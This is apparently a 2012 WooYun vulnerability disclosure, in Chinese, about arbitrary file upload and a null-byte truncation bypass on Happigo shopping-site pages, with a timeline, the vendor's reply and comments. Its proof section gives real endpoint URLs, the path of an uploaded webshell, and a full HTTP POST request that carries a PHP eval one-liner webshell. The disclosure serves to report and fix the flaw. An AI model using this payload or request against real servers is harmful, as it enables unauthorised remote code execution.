当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011109

漏洞标题:快乐购物网任意文件上传&欺骗上传漏洞技巧

相关厂商:快乐购物股份有限公司

漏洞作者: Tea

提交时间:2012-08-20 13:47

修复时间:2012-10-04 13:48

公开时间:2012-10-04 13:48

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-20: 细节已通知厂商并且等待厂商处理中
2012-08-20: 厂商已经确认,细节仅向厂商公开
2012-08-30: 细节向核心白帽子及相关领域专家公开
2012-09-09: 细节向普通白帽子公开
2012-09-19: 细节向实习白帽子公开
2012-10-04: 细节向公众公开

简要描述:

某公司任意文件上传,另外的上传页面存在欺骗上传漏洞(%00截断)..

详细说明:

某公司任意文件上传,另外的上传页面存在欺骗上传漏洞(%00截断)..
欺骗上传的,不返回路径,通过前面上传的shell去看了下,确实是上传成功了的...

漏洞证明:

返回上传路径的上传页面

http://zt.happigo.com/sc/d/xiangjijie/post_pic.php#upload_


上传的shell

http://zt.happigo.com/sc/d/xiangjijie/uploads/2012/08/20/dc3fbca363fe2a1aaf08b38e2833f403.php



另外的页面,可以通过%00截断上传,但是不返回上传的路径,但是去路径下面看了下,确实是上传上去的了~

POST /sc/d/gougoukeaixiu/action.php?method=upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://zt.happigo.com/sc/d/gougoukeaixiu/index.php?result=success
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7dc31fc170554
Accept-Encoding: gzip, deflate
Host: zt.happigo.com
Content-Length: 1600
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [cookies]
-----------------------------7dc31fc170554
Content-Disposition: form-data; name="fileField"; filename="3.php"
Content-Type: image/pjpeg
<?php @eval($_REQUEST['ok']);?>
-----------------------------7dc31fc170554
Content-Disposition: form-data; name="title"
OK
-----------------------------7dc31fc170554--


上传上去的shell


另外的


不返回路径的上传页面

http://zt.happigo.com/sc/d/apply100930/upload.html
http://zt.happigo.com/sc/d/gougoukeaixiu/index.php

修复方案:

在服务器端上传文件检查。另注:贵公司要对根目录下面的各个子文件夹下面的上传页面做检查~

版权声明:转载请注明来源 Tea@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-08-20 17:10

厂商回复:

之前通过定期手工对上传文件进行检查来发现异常,感谢提交者发现此漏洞,我们将积极通过程序来自动对上传文件进行检查来进行整改,感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2012-08-20 13:50 | Tea ( 普通白帽子 | Rank:297 漏洞数:37 | Can't We Be Young.)

    wooyun,%00后面的内容被截断了....?

  2. 2012-08-20 14:19 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Tea 貌似。。。

  3. 2012-09-10 12:40 | xiaokinghk ( 实习白帽子 | Rank:82 漏洞数:16 | 【DBA】)

    WooYun: 快乐购文件上传命令执行 表示 老早就发了。。。 居然都没改正。。。

  4. 2012-09-20 12:14 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    然后可以透露下你是怎么找到传上去后的地址呢?

  5. 2012-09-20 21:52 | Tea ( 普通白帽子 | Rank:297 漏洞数:37 | Can't We Be Young.)

    @小胖子 通过另外返回路径的上传拿到SHELL,再去相应的目录看的..上面有写 。。。